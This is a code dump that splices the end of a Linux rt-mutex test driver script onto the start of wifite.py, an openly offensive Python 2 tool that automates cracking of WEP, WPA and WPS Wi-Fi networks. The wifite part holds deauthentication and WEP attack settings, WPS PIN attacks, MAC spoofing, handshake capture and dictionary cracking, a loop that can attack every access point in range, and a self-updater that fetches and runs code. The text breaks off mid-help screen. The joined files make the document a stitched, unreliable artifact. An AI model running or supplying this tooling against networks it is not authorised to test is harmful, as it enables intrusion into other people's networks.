test_opcodes = {
"prioeq" : ["P" , "eq" , None],
"priolt" : ["P" , "lt" , None],
"priogt" : ["P" , "gt" , None],
"nprioeq" : ["N" , "eq" , None],
"npriolt" : ["N" , "lt" , None],
"npriogt" : ["N" , "gt" , None],
"unlocked" : ["M" , "eq" , 0],
"trylock" : ["M" , "eq" , 1],
"blocked" : ["M" , "eq" , 2],
"blockedwake" : ["M" , "eq" , 3],
"locked" : ["M" , "eq" , 4],
"opcodeeq" : ["O" , "eq" , None],
"opcodelt" : ["O" , "lt" , None],
"opcodegt" : ["O" , "gt" , None],
"eventeq" : ["E" , "eq" , None],
"eventlt" : ["E" , "lt" , None],
"eventgt" : ["E" , "gt" , None],
}
# Print usage information
def usage():
print "rt-tester.py <-c -h -q -t> <testfile>"
print " -c display comments after first command"
print " -h help"
print " -q quiet mode"
print " -t test mode (syntax check)"
print " testfile: read test specification from testfile"
print " otherwise from stdin"
return
# Print progress when not in quiet mode
def progress(str):
if not quiet:
print str
# Analyse a status value
def analyse(val, top, arg):
intval = int(val)
if top[0] == "M":
intval = intval / (10 ** int(arg))
intval = intval % 10
argval = top[2]
elif top[0] == "O":
argval = int(cmd_opcodes.get(arg, arg))
else:
argval = int(arg)
# progress("%d %s %d" %(intval, top[1], argval))
if top[1] == "eq" and intval == argval:
return 1
if top[1] == "lt" and intval < argval:
return 1
if top[1] == "gt" and intval > argval:
return 1
return 0
# Parse the commandline
try:
(options, arguments) = getopt.getopt(sys.argv[1:],'chqt')
except getopt.GetoptError, ex:
usage()
sys.exit(1)
# Parse commandline options
for option, value in options:
if option == "-c":
comments = 1
elif option == "-q":
quiet = 1
elif option == "-t":
test = 1
elif option == '-h':
usage()
sys.exit(0)
# Select the input source
if arguments:
try:
fd = open(arguments[0])
except Exception,ex:
sys.stderr.write("File not found %s\n" %(arguments[0]))
sys.exit(1)
else:
fd = sys.stdin
linenr = 0
# Read the test patterns
while 1:
linenr = linenr + 1
line = fd.readline()
if not len(line):
break
line = line.strip()
parts = line.split(":")
if not parts or len(parts) < 1:
continue
if len(parts[0]) == 0:
continue
if parts[0].startswith("#"):
if comments > 1:
progress(line)
continue
if comments == 1:
comments = 2
progress(line)
cmd = parts[0].strip().lower()
opc = parts[1].strip().lower()
tid = parts[2].strip()
dat = parts[3].strip()
try:
# Test or wait for a status value
if cmd == "t" or cmd == "w":
testop = test_opcodes[opc]
fname = "%s%s%s" %(sysfsprefix, tid, statusfile)
if test:
print fname
continue
while 1:
query = 1
fsta = open(fname, 'r')
status = fsta.readline().strip()
fsta.close()
stat = status.split(",")
for s in stat:
s = s.strip()
if s.startswith(testop[0]):
# Separate status value
val = s[2:].strip()
query = analyse(val, testop, dat)
break
if query or cmd == "t":
break
progress(" " + status)
if not query:
sys.stderr.write("Test failed in line %d\n" %(linenr))
sys.exit(1)
# Issue a command to the tester
elif cmd == "c":
cmdnr = cmd_opcodes[opc]
# Build command string and sys filename
cmdstr = "%s:%s" %(cmdnr, dat)
fname = "%s%s%s" %(sysfsprefix, tid, commandfile)
if test:
print fname
continue
fcmd = open(fname, 'w')
fcmd.write(cmdstr)
fcmd.close()
except Exception,ex:
sys.stderr.write(str(ex))
sys.stderr.write("\nSyntax error in line %d\n" %(linenr))
if not test:
fd.close()
sys.exit(1)
# Normal exit pass
print "Pass"
sys.exit(0)
| gpl-2.0 |
redcodesick/wifite | wifite.py | 56 | 98589 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
wifite
author: derv82 at gmail
Licensed under the GNU General Public License Version 2 (GNU GPL v2),
available at: http://www.gnu.org/licenses/gpl-2.0.txt
(C) 2011 Derv Merkler
-----------------
TODO:
ignore root check when -cracked (afterward) (need root for -check?)
"cracked*" in list of AP's
Restore same command-line switch names from v1
If device already in monitor mode, check for and, if applicable, use macchanger
WPS
* Mention reaver automatically resumes sessions
* Warning about length of time required for WPS attack (*hours*)
* Show time since last successful attempt
* Percentage of tries/attempts ?
* Update code to work with reaver 1.4 ("x" sec/att)
WEP:
* ability to pause/skip/continue (done, not tested)
* Option to capture only IVS packets (uses --output-format ivs,csv)
- not compatible on older aircrack-ng's.
- Just run "airodump-ng --output-format ivs,csv", "No interface specified" = works
- would cut down on size of saved .caps
reaver:
MONITOR ACTIVITY!
- Enter ESSID when executing (?)
- Ensure WPS key attempts have begun.
- If no attempts can be made, stop attack
- During attack, if no attempts are made within X minutes, stop attack & Print
- Reaver's output when unable to associate:
[!] WARNING: Failed to associate with AA:BB:CC:DD:EE:FF (ESSID: ABCDEF)
- If failed to associate for x minutes, stop attack (same as no attempts?)
MIGHTDO:
* WPA - crack (pyrit/cowpatty) (not really important)
* Test injection at startup? (skippable via command-line switch)
"""
#############
# LIBRARIES #
#############
import os # File management
import time # Measuring attack intervals
import random # Generating a random MAC address.
import errno # Error numbers
from sys import argv # Command-line arguments
from sys import stdout, stdin # Flushing
from shutil import copy # Copying .cap files
# Executing, communicating with, killing processes
from subprocess import Popen, call, PIPE
from signal import SIGINT, SIGTERM
import re # RegEx, Converting SSID to filename
import urllib # Check for new versions from the repo
################################
# GLOBAL VARIABLES IN ALL CAPS #
################################
REVISION = 85;
# WPA variables
WPA_DISABLE = False # Flag to skip WPA handshake capture
WPA_STRIP_HANDSHAKE = True # Use pyrit or tshark (if applicable) to strip handshake
WPA_DEAUTH_TIMEOUT = 10 # Time to wait between deauthentication bursts (in seconds)
WPA_ATTACK_TIMEOUT = 500 # Total time to allow for a handshake attack (in seconds)
WPA_HANDSHAKE_DIR = 'hs' # Directory in which handshakes .cap files are stored
# Strip file path separator if needed
if WPA_HANDSHAKE_DIR != '' and WPA_HANDSHAKE_DIR[-1] == os.sep:
WPA_HANDSHAKE_DIR = WPA_HANDSHAKE_DIR[:-1]
WPA_FINDINGS = [] # List of strings containing info on successful WPA attacks
WPA_DONT_CRACK = False # Flag to skip cracking of handshakes
WPA_DICTIONARY = '/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'
if not os.path.exists(WPA_DICTIONARY): WPA_DICTIONARY = ''
# Various programs to use when checking for a four-way handshake.
# True means the program must find a valid handshake in order for wifite to recognize a handshake.
# Not finding handshake short circuits result (ALL 'True' programs must find handshake)
WPA_HANDSHAKE_TSHARK = True # Checks for sequential 1,2,3 EAPOL msg packets (ignores 4th)
WPA_HANDSHAKE_PYRIT = False # Sometimes crashes on incomplete dumps, but accurate.
WPA_HANDSHAKE_AIRCRACK = True # Not 100% accurate, but fast.
WPA_HANDSHAKE_COWPATTY = False # Uses more lenient "nonstrict mode" (-2)
# WEP variables
WEP_DISABLE = False # Flag for ignoring WEP networks
WEP_PPS = 600 # packets per second (Tx rate)
WEP_TIMEOUT = 600 # Amount of time to give each attack
WEP_ARP_REPLAY = True # Various WEP-based attacks via aireplay-ng
WEP_CHOPCHOP = True #
WEP_FRAGMENT = True #
WEP_CAFFELATTE = True #
WEP_P0841 = True
WEP_HIRTE = True
WEP_CRACK_AT_IVS = 10000 # Number of IVS at which we start cracking
WEP_IGNORE_FAKEAUTH = True # When True, continues attack despite fake authentication failure
WEP_FINDINGS = [] # List of strings containing info on successful WEP attacks.
WEP_SAVE = False # Save packets.
# WPS variables
WPS_DISABLE = False # Flag to skip WPS scan and attacks
WPS_FINDINGS = [] # List of (successful) results of WPS attacks
WPS_TIMEOUT = 660 # Time to wait (in seconds) for successful PIN attempt
WPS_RATIO_THRESHOLD = 0.01 # Lowest percentage of tries/attempts allowed (where tries > 0)
WPS_MAX_RETRIES = 0 # Number of times to re-try the same pin before giving up completely.
# Program variables
WIRELESS_IFACE = '' # User-defined interface
TARGET_CHANNEL = 0 # User-defined channel to scan on
TARGET_ESSID = '' # User-defined ESSID of specific target to attack
TARGET_BSSID = '' # User-defined BSSID of specific target to attack
IFACE_TO_TAKE_DOWN = '' # Interface that wifite puts into monitor mode
# It's our job to put it out of monitor mode after the attacks
ORIGINAL_IFACE_MAC = ('', '') # Original interface name[0] and MAC address[1] (before spoofing)
DO_NOT_CHANGE_MAC = True # Flag for disabling MAC anonymizer
TARGETS_REMAINING = 0 # Number of access points remaining to attack
WPA_CAPS_TO_CRACK = [] # list of .cap files to crack (full of CapFile objects)
THIS_MAC = '' # The interfaces current MAC address.
SHOW_MAC_IN_SCAN = False # Display MACs of the SSIDs in the list of targets
CRACKED_TARGETS = [] # List of targets we have already cracked
ATTACK_ALL_TARGETS = False # Flag for when we want to attack *everyone*
ATTACK_MIN_POWER = 0 # Minimum power (dB) for access point to be considered a target
VERBOSE_APS = True # Print access points as they appear
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
if os.getuid() != 0:
print R+' [!]'+O+' ERROR:'+G+' wifite'+O+' must be run as '+R+'root'+W
print R+' [!]'+O+' login as root ('+W+'su root'+O+') or try '+W+'sudo ./wifite.py'+W
exit(1)
if not os.uname()[0].startswith("Linux") and not 'Darwin' in os.uname()[0]: # OSX support, 'cause why not?
print O+' [!]'+R+' WARNING:'+G+' wifite'+W+' must be run on '+O+'linux'+W
exit(1)
# Create temporary directory to work in
from tempfile import mkdtemp
temp = mkdtemp(prefix='wifite')
if not temp.endswith(os.sep):
temp += os.sep
# /dev/null, send output from programs so they don't print to screen.
DN = open(os.devnull, 'w')
###################
# DATA STRUCTURES #
###################
class CapFile:
"""
Holds data about an access point's .cap file, including AP's ESSID & BSSID.
"""
def __init__(self, filename, ssid, bssid):
self.filename = filename
self.ssid = ssid
self.bssid = bssid
class Target:
"""
Holds data for a Target (aka Access Point aka Router)
"""
def __init__(self, bssid, power, data, channel, encryption, ssid):
self.bssid = bssid
self.power = power
self.data = data
self.channel = channel
self.encryption = encryption
self.ssid = ssid
self.wps = False # Default to non-WPS-enabled router.
self.key = ''
class Client:
"""
Holds data for a Client (device connected to Access Point/Router)
"""
def __init__(self, bssid, station, power):
self.bssid = bssid
self.station = station
self.power = power
##################
# MAIN FUNCTIONS #
##################
def main():
"""
Where the magic happens.
"""
global TARGETS_REMAINING, THIS_MAC, CRACKED_TARGETS
CRACKED_TARGETS = load_cracked() # Load previously-cracked APs from file
handle_args() # Parse args from command line, set global variables.
initial_check() # Ensure required programs are installed.
# The "get_iface" method anonymizes the MAC address (if needed)
# and puts the interface into monitor mode.
iface = get_iface()
THIS_MAC = get_mac_address(iface) # Store current MAC address
(targets, clients) = scan(iface=iface, channel=TARGET_CHANNEL)
try:
index = 0
while index < len(targets):
target = targets[index]
# Check if we have already cracked this target
for already in CRACKED_TARGETS:
if already.bssid == targets[index].bssid:
print R+'\n [!]'+O+' you have already cracked this access point\'s key!'+W
print R+' [!] %s' % (C+already.ssid+W+': "'+G+already.key+W+'"')
ri = raw_input(GR+' [+] '+W+'do you want to crack this access point again? ('+G+'y/'+O+'n'+W+'): ')
if ri.lower() == 'n':
targets.pop(index)
index -= 1
break
# Check if handshakes already exist, ask user whether to skip targets or save new handshakes
handshake_file = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
+ '_' + target.bssid.replace(':', '-') + '.cap'
if os.path.exists(handshake_file):
print R+'\n [!] '+O+'you already have a handshake file for %s:' % (C+target.ssid+W)
print ' %s\n' % (G+handshake_file+W)
print GR+' [+]'+W+' do you want to '+G+'[s]kip'+W+', '+O+'[c]apture again'+W+', or '+R+'[o]verwrite'+W+'?'
ri = 'x'
while ri != 's' and ri != 'c' and ri != 'o':
ri = raw_input(GR+' [+] '+W+'enter '+G+'s'+W+', '+O+'c,'+W+' or '+R+'o'+W+': '+G).lower()
print W+"\b",
if ri == 's':
targets.pop(index)
index -= 1
elif ri == 'o':
remove_file(handshake_file)
continue
index += 1
except KeyboardInterrupt:
print '\n '+R+'(^C)'+O+' interrupted\n'
exit_gracefully(0)
wpa_success = 0
wep_success = 0
wpa_total = 0
wep_total = 0
TARGETS_REMAINING = len(targets)
for t in targets:
TARGETS_REMAINING -= 1
# Build list of clients connected to target
ts_clients = []
for c in clients:
if c.station == t.bssid:
ts_clients.append(c)
print ''
if t.encryption.find('WPA') != -1:
need_handshake = True
if not WPS_DISABLE and t.wps:
need_handshake = not wps_attack(iface, t)
wpa_total += 1
if not need_handshake: wpa_success += 1
if TARGETS_REMAINING < 0: break
if not WPA_DISABLE and need_handshake:
wpa_total += 1
if wpa_get_handshake(iface, t, ts_clients):
wpa_success += 1
elif t.encryption.find('WEP') != -1:
wep_total += 1
if attack_wep(iface, t, ts_clients):
wep_success += 1
else: print R+' unknown encryption:',t.encryption,W
# If user wants to stop attacking
if TARGETS_REMAINING <= 0: break
if wpa_total + wep_total > 0:
# Attacks are done! Show results to user
print ''
print GR+' [+] %s%d attack%s completed:%s' % (G, wpa_total + wep_total, '' if wpa_total+wep_total == 1 else 's', W)
print ''
if wpa_total > 0:
if wpa_success == 0: print GR+' [+]'+R,
elif wpa_success == wpa_total: print GR+' [+]'+G,
else: print GR+' [+]'+O,
print '%d/%d%s WPA attacks succeeded' % (wpa_success, wpa_total, W)
for finding in WPA_FINDINGS:
print ' ' + C+finding+W
if wep_total > 0:
if wep_success == 0: print GR+' [+]'+R,
elif wep_success == wep_total: print GR+' [+]'+G,
else: print GR+' [+]'+O,
print '%d/%d%s WEP attacks succeeded' % (wep_success, wep_total, W)
for finding in WEP_FINDINGS:
print ' ' + C+finding+W
caps = len(WPA_CAPS_TO_CRACK)
if caps > 0 and not WPA_DONT_CRACK:
print GR+' [+]'+W+' starting '+G+'WPA cracker'+W+' on %s%d handshake%s' % (G, caps, W if caps == 1 else 's'+W)
for cap in WPA_CAPS_TO_CRACK:
wpa_crack(cap)
print ''
exit_gracefully(0)
def rename(old, new):
"""
Renames file 'old' to 'new', works with separate partitions.
Thanks to hannan.sadar
"""
try:
os.rename(old, new)
except os.error, detail:
if detail.errno == errno.EXDEV:
try:
copy(old, new)
except:
os.unlink(new)
raise
os.unlink(old)
# if desired, deal with other errors
else:
raise
def initial_check():
"""
Ensures required programs are installed.
"""
global WPS_DISABLE
airs = ['aircrack-ng', 'airodump-ng', 'aireplay-ng', 'airmon-ng', 'packetforge-ng']
for air in airs:
if program_exists(air): continue
print R+' [!]'+O+' required program not found: %s' % (R+air+W)
print R+' [!]'+O+' this program is bundled with the aircrack-ng suite:'+W
print R+' [!]'+O+' '+C+'http://www.aircrack-ng.org/'+W
print R+' [!]'+O+' or: '+W+'sudo apt-get install aircrack-ng\n'+W
exit_gracefully(1)
if not program_exists('iw'):
print R+' [!]'+O+' airmon-ng requires the program %s\n' % (R+'iw'+W)
exit_gracefully(1)
printed = False
# Check reaver
if not program_exists('reaver'):
printed = True
print R+' [!]'+O+' the program '+R+'reaver'+O+' is required for WPS attacks'+W
print R+' '+O+' available at '+C+'http://code.google.com/p/reaver-wps'+W
WPS_DISABLE = True
elif not program_exists('walsh') and not program_exists('wash'):
printed = True
print R+' [!]'+O+' reaver\'s scanning tool '+R+'walsh'+O+' (or '+R+'wash'+O+') was not found'+W
print R+' [!]'+O+' please re-install reaver or install walsh/wash separately'+W
# Check handshake-checking apps
recs = ['tshark', 'pyrit', 'cowpatty']
for rec in recs:
if program_exists(rec): continue
printed = True
print R+' [!]'+O+' the program %s is not required, but is recommended%s' % (R+rec+O, W)
if printed: print ''
def handle_args():
"""
Handles command-line arguments, sets global variables.
"""
global WIRELESS_IFACE, TARGET_CHANNEL, DO_NOT_CHANGE_MAC, TARGET_ESSID, TARGET_BSSID
global WPA_DISABLE, WPA_STRIP_HANDSHAKE, WPA_DEAUTH_TIMEOUT, WPA_ATTACK_TIMEOUT
global WPA_DONT_CRACK, WPA_DICTIONARY, WPA_HANDSHAKE_TSHARK, WPA_HANDSHAKE_PYRIT
global WPA_HANDSHAKE_AIRCRACK, WPA_HANDSHAKE_COWPATTY
global WEP_DISABLE, WEP_PPS, WEP_TIMEOUT, WEP_ARP_REPLAY, WEP_CHOPCHOP, WEP_FRAGMENT
global WEP_CAFFELATTE, WEP_P0841, WEP_HIRTE, WEP_CRACK_AT_IVS, WEP_IGNORE_FAKEAUTH
global WEP_SAVE, SHOW_MAC_IN_SCAN, ATTACK_ALL_TARGETS, ATTACK_MIN_POWER
global WPS_DISABLE, WPS_TIMEOUT, WPS_RATIO_THRESHOLD, WPS_MAX_RETRIES
global VERBOSE_APS
args = argv[1:]
if args.count('-h') + args.count('--help') + args.count('?') + args.count('-help') > 0:
help()
exit_gracefully(0)
set_encrypt = False
set_hscheck = False
set_wep = False
capfile = '' # Filename of .cap file to analyze for handshakes
try:
for i in xrange(0, len(args)):
if not set_encrypt and (args[i] == '-wpa' or args[i] == '-wep' or args[i] == '-wps'):
WPS_DISABLE = True
WPA_DISABLE = True
WEP_DISABLE = True
set_encrypt = True
if args[i] == '-wpa':
print GR+' [+]'+W+' targeting '+G+'WPA'+W+' encrypted networks (use '+G+'-wps'+W+' for WPS scan)'
WPA_DISABLE = False
elif args[i] == '-wep':
print GR+' [+]'+W+' targeting '+G+'WEP'+W+' encrypted networks'
WEP_DISABLE = False
elif args[i] == '-wps':
print GR+' [+]'+W+' targeting '+G+'WPS-enabled'+W+' networks'
WPS_DISABLE = False
elif args[i] == '-c':
i += 1
try: TARGET_CHANNEL = int(args[i])
except ValueError: print O+' [!]'+R+' invalid channel: '+O+args[i]+W
except IndexError: print O+' [!]'+R+' no channel given!'+W
else: print GR+' [+]'+W+' channel set to %s' % (G+args[i]+W)
elif args[i] == '-mac':
print GR+' [+]'+W+' mac address anonymizing '+G+'enabled'+W
print O+' note: only works if device is not already in monitor mode!'+W
DO_NOT_CHANGE_MAC = False
elif args[i] == '-i':
i += 1
WIRELESS_IFACE = args[i]
print GR+' [+]'+W+' set interface: %s' % (G+args[i]+W)
elif args[i] == '-e':
i += 1
try: TARGET_ESSID = args[i]
except ValueError: print R+' [!]'+O+' no ESSID given!'+W
else: print GR+' [+]'+W+' targeting ESSID "%s"' % (G+args[i]+W)
elif args[i] == '-b':
i += 1
try: TARGET_BSSID = args[i]
except ValueError: print R+' [!]'+O+' no BSSID given!'+W
else: print GR+' [+]'+W+' targeting BSSID "%s"' % (G+args[i]+W)
elif args[i] == '-showb' or args[i] == '-showbssid':
SHOW_MAC_IN_SCAN = True
print GR+' [+]'+W+' target MAC address viewing '+G+'enabled'+W
elif args[i] == '-all' or args[i] == '-hax0ritna0':
print GR+' [+]'+W+' targeting '+G+'all access points'+W
ATTACK_ALL_TARGETS = True
elif args[i] == '-pow' or args[i] == '-power':
i += 1
try:
ATTACK_MIN_POWER = int(args[i])
except ValueError: print R+' [!]'+O+' invalid power level: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no power level given!'+W
else: print GR+' [+]'+W+' minimum target power set to %s' % (G+args[i] + "dB"+W)
elif args[i] == '-q' or args[i] == '-quiet':
VERBOSE_APS = False
print GR+' [+]'+W+' list of APs during scan '+O+'disabled'+W
elif args[i] == '-check':
i += 1
try: capfile = args[i]
except IndexError:
print R+' [!]'+O+' unable to analyze capture file'+W
print R+' [!]'+O+' no cap file given!\n'+W
exit_gracefully(1)
else:
if not os.path.exists(capfile):
print R+' [!]'+O+' unable to analyze capture file!'+W
print R+' [!]'+O+' file not found: '+R+capfile+'\n'+W
exit_gracefully(1)
elif args[i] == '-upgrade' or args[i] == '-update':
upgrade()
exit(0)
elif args[i] == '-cracked':
if len(CRACKED_TARGETS) == 0:
print R+' [!]'+O+' there are not cracked access points saved to '+R+'cracked.txt\n'+W
exit_gracefully(1)
print GR+' [+]'+W+' '+W+'previously cracked access points'+W+':'
for victim in CRACKED_TARGETS:
print ' %s (%s) : "%s"' % (C+victim.ssid+W, C+victim.bssid+W, G+victim.key+W)
print ''
exit_gracefully(0)
# WPA
if not set_hscheck and (args[i] == '-tshark' or args[i] == '-cowpatty' or args[i] == '-aircrack' or args[i] == 'pyrit'):
WPA_HANDSHAKE_TSHARK = False
WPA_HANDSHAKE_PYRIT = False
WPA_HANDSHAKE_COWPATTY = False
WPA_HANDSHAKE_AIRCRACK = False
set_hscheck = True
elif args[i] == '-strip':
WPA_STRIP_HANDSHAKE = True
print GR+' [+]'+W+' handshake stripping '+G+'enabled'+W
elif args[i] == '-wpadt':
i += 1
WPA_DEAUTH_TIMEOUT = int(args[i])
print GR+' [+]'+W+' WPA deauth timeout set to %s' % (G+args[i]+' seconds'+W)
elif args[i] == '-wpat':
i += 1
WPA_ATTACK_TIMEOUT = int(args[i])
print GR+' [+]'+W+' WPA attack timeout set to %s' % (G+args[i]+' seconds'+W)
elif args[i] == '-crack':
WPA_DONT_CRACK = False
print GR+' [+]'+W+' WPA cracking '+G+'enabled'+W
elif args[i] == '-dict':
i += 1
try:
WPA_DICTIONARY = args[i]
except IndexError: print R+' [!]'+O+' no WPA dictionary given!'
else:
if os.path.exists(args[i]):
print GR+' [+]'+W+' WPA dictionary set to %s' % (G+args[i]+W)
else:
print R+' [!]'+O+' WPA dictionary file not found: %s' % (args[i])
if args[i] == '-tshark':
WPA_HANDSHAKE_TSHARK = True
print GR+' [+]'+W+' tshark handshake verification '+G+'enabled'+W
if args[i] == '-pyrit':
WPA_HANDSHAKE_PYRIT = True
print GR+' [+]'+W+' pyrit handshake verification '+G+'enabled'+W
if args[i] == '-aircrack':
WPA_HANDSHAKE_AIRCRACK = True
print GR+' [+]'+W+' aircrack handshake verification '+G+'enabled'+W
if args[i] == '-cowpatty':
WPA_HANDSHAKE_COWPATTY = True
print GR+' [+]'+W+' cowpatty handshake verification '+G+'enabled'+W
# WEP
if not set_wep and args[i] == '-chopchop' or args[i] == 'fragment' or \
args[i] == 'caffelatte' or args[i] == '-arpreplay' or \
args[i] == '-p0841' or args[i] == '-hirte':
WEP_CHOPCHOP = False
WEP_ARPREPLAY = False
WEP_CAFFELATTE = False
WEP_FRAGMENT = False
WEP_P0841 = False
WEP_HIRTE = False
if args[i] == '-chopchop':
print GR+' [+]'+W+' WEP chop-chop attack '+G+'enabled'+W
WEP_CHOPCHOP = True
if args[i] == '-fragment' or args[i] == '-frag' or args[i] == '-fragmentation':
print GR+' [+]'+W+' WEP fragmentation attack '+G+'enabled'+W
WEP_FRAGMENT = True
if args[i] == '-caffelatte':
print GR+' [+]'+W+' WEP caffe-latte attack '+G+'enabled'+W
WEP_CAFFELATTE = True
if args[i] == '-arpreplay':
print GR+' [+]'+W+' WEP arp-replay attack '+G+'enabled'+W
WEP_ARPREPLAY = True
if args[i] == '-p0841':
print GR+' [+]'+W+' WEP p0841 attack '+G+'enabled'+W
WEP_P0841 = True
if args[i] == '-hirte':
print GR+' [+]'+W+' WEP hirte attack '+G+'enabled'+W
WEP_HIRTE = True
if args[i] == '-nofake':
print GR+' [+]'+W+' ignoring failed fake-authentication '+R+'disabled'+W
WEP_IGNORE_FAKEAUTH = False
if args[i] == '-wept' or args[i] == '-weptime':
i += 1
try:
WEP_TIMEOUT = int(args[i])
except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no timeout given!'+W
else: print GR+' [+]'+W+' WEP attack timeout set to %s' % (G+args[i] + " seconds"+W)
if args[i] == '-pps':
i += 1
try:
WEP_PPS = int(args[i])
except ValueError: print R+' [!]'+O+' invalid value: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no value given!'+W
else: print GR+' [+]'+W+' packets-per-second rate set to %s' % (G+args[i] + " packets/sec"+W)
if args[i] == '-save' or args[i] == '-wepsave':
WEP_SAVE = True
print GR+' [+]'+W+' WEP .cap file saving '+G+'enabled'+W
# WPS
if args[i] == '-wpst' or args[i] == '-wpstime':
i += 1
try:
WPS_TIMEOUT = int(args[i])
except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no timeout given!'+W
else: print GR+' [+]'+W+' WPS attack timeout set to %s' % (G+args[i] + " seconds"+W)
if args[i] == '-wpsratio' or args[i] == 'wpsr':
i += 1
try:
WPS_RATIO_THRESHOLD = float(args[i])
except ValueError: print R+' [!]'+O+' invalid percentage: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no ratio given!'+W
else: print GR+' [+]'+W+' minimum WPS tries/attempts threshold set to %s' % (G+args[i] + ""+W)
if args[i] == '-wpsmaxr' or args[i] == '-wpsretry':
i += 1
try:
WPS_MAX_RETRIES = int(args[i])
except ValueError: print R+' [!]'+O+' invalid number: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no number given!'+W
else: print GR+' [+]'+W+' WPS maximum retries set to %s' % (G+args[i] + " retries"+W)
except IndexError:
print '\nindexerror\n\n'
if capfile != '':
analyze_capfile(capfile)
print ''
def banner():
"""
Displays ASCII art of the highest caliber.
"""
global REVISION
print ''
print G+" .;' `;, "
print G+" .;' ,;' `;, `;, "+W+"WiFite v2 (r" + str(REVISION) + ")"
print G+".;' ,;' ,;' `;, `;, `;, "
print G+":: :: : "+GR+"( )"+G+" : :: :: "+GR+"automated wireless auditor"
print G+"':. ':. ':. "+GR+"/_\\"+G+" ,:' ,:' ,:' "
print G+" ':. ':. "+GR+"/___\\"+G+" ,:' ,:' "+GR+"designed for Linux"
print G+" ':. "+GR+"/_____\\"+G+" ,:' "
print G+" "+GR+"/ \\"+G+" "
print W
def upgrade():
"""
Checks for new version, prompts to upgrade, then
replaces this script with the latest from the repo
"""
global REVISION
try:
print GR+' [!]'+W+' upgrading requires an '+G+'internet connection'+W
print GR+' [+]'+W+' checking for latest version...'
(revision, description, date_changed) = get_revision()
if revision == -1:
print R+' [!]'+O+' unable to access googlecode'+W
elif revision > REVISION:
print GR+' [!]'+W+' a new version is '+G+'available!'+W
print GR+' [-]'+W+' revision: '+G+str(revision)+W
print GR+' [-]'+W+' description: '+G+description+W
print GR+' [-]'+W+' date added: '+G+date_changed+W
response = raw_input(GR+' [+]'+W+' do you want to upgrade to the latest version? (y/n): ')
if not response.lower().startswith('y'):
print GR+' [-]'+W+' upgrading '+O+'aborted'+W
exit_gracefully(0)
return
# Download script, replace with this one
print GR+' [+] '+G+'downloading'+W+' update...'
try:
sock = urllib.urlopen('http://wifite.googlecode.com/svn/trunk/wifite.py')
page = sock.read()
except IOError:
page = ''
if page == '':
print R+' [+] '+O+'unable to download latest version'+W
exit_gracefully(1)
# Create/save the new script
f=open('wifite_new.py','w')
f.write(page)
f.close()
# The filename of the running script
this_file = __file__
if this_file.startswith('./'):
this_file = this_file[2:]
# create/save a shell script that replaces this script with the new one
f = open('update_wifite.sh','w')
f.write('''#!/bin/sh\n
rm -rf ''' + this_file + '''\n
mv wifite_new.py ''' + this_file + '''\n
rm -rf update_wifite.sh\n
chmod +x ''' + this_file + '''\n
''')
f.close()
# Change permissions on the script
returncode = call(['chmod','+x','update_wifite.sh'])
if returncode != 0:
print R+' [!]'+O+' permission change returned unexpected code: '+str(returncode)+W
exit_gracefully(1)
# Run the script
returncode = call(['sh','update_wifite.sh'])
if returncode != 0:
print R+' [!]'+O+' upgrade script returned unexpected code: '+str(returncode)+W
exit_gracefully(1)
print GR+' [+] '+G+'updated!'+W+' type "./' + this_file + '" to run again'
else:
print GR+' [-]'+W+' your copy of wifite is '+G+'up to date'+W
except KeyboardInterrupt:
print R+'\n (^C)'+O+' wifite upgrade interrupted'+W
exit_gracefully(0)
def get_revision():
"""
Gets latest revision # from google code repository
Returns tuple: revision#, description of change, date changed
"""
irev =-1
desc =''
since=''
try:
sock = urllib.urlopen('http://code.google.com/p/wifite/source/list?path=/trunk/wifite.py')
page = sock.read()
except IOError:
return (-1, '', '')
# get the revision
start= page.find('href="detail?r=')
stop = page.find('&', start)
if start != -1 and stop != -1:
start += 15
rev=page[start:stop]
try:
irev=int(rev)
except ValueError:
rev=rev.split('\n')[0]
print R+'[+] invalid revision number: "'+rev+'"'
# get the description
start= page.find(' href="detail?r='+str(irev)+'', start + 3)
start= page.find('">',start)
stop = page.find('</a>', start)
if start != -1 and stop != -1:
start += 2
desc=page[start:stop].strip()
desc=desc.replace("'","'")
desc=desc.replace("<","<")
desc=desc.replace(">",">")
if '\n' in desc:
desc = desc.split('\n')[0]
# get the time last modified
start= page.find(' href="detail?r='+str(irev)+'', start + 3)
start= page.find('">',start)
stop = page.find('</a>', start)
if start != -1 and stop != -1:
start += 2
since=page[start:stop]
return (irev, desc, since)
def help():
"""
Prints help screen
"""
head = W
sw = G
var = GR
des = W
de = G
print head+' COMMANDS'+W
print sw+'\t-check '+var+'<file>\t'+des+'check capfile '+var+'<file>'+des+' for handshakes.'+W
print sw+'\t-cracked \t'+des+'display previously-cracked access points'+W
print ''
print head+' GLOBAL'+W
print sw+'\t-all \t'+des+'attack all targets. '+de+'[off]'+W
print sw+'\t-i '+var+'<iface> \t'+des+'wireless interface for capturing '+de+'[auto]'+W
print sw+'\t-mac \t'+des+'anonymize mac address '+de+'[off]'+W
print sw+'\t-c '+var+'<channel>\t'+des+'channel to scan for targets '+de+'[auto]'+W
print sw+'\t-e '+var+'<essid> \t'+des+'target a specific access point by ssid (name) '+de+'[ask]'+W
print sw+'\t-b '+var+'<bssid> \t'+des+'target a specific access point by bssid (mac) '+de+'[auto]'+W
print sw+'\t-showb \t'+des+'display target BSSIDs after scan '+de+'[off]'+W
print sw+'\t-pow '+var+'<db> \t'+des+'attacks any targets with signal strenghth > '+var+'db '+de+'[0]'+W
print sw+'\t-quiet \t'+des+'do not print list of APs during scan '+de+'[off]'+W
print ''
print head+'\n WPA'+W
print sw+'\t-wpa \t'+des+'only target WPA networks (works with -wps -wep) '+de+'[off]'+W
print sw+'\t-wpat '+var+'<sec> \t'+des+'time to wait for WPA attack to complete (seconds) '+de+'[500]'+W
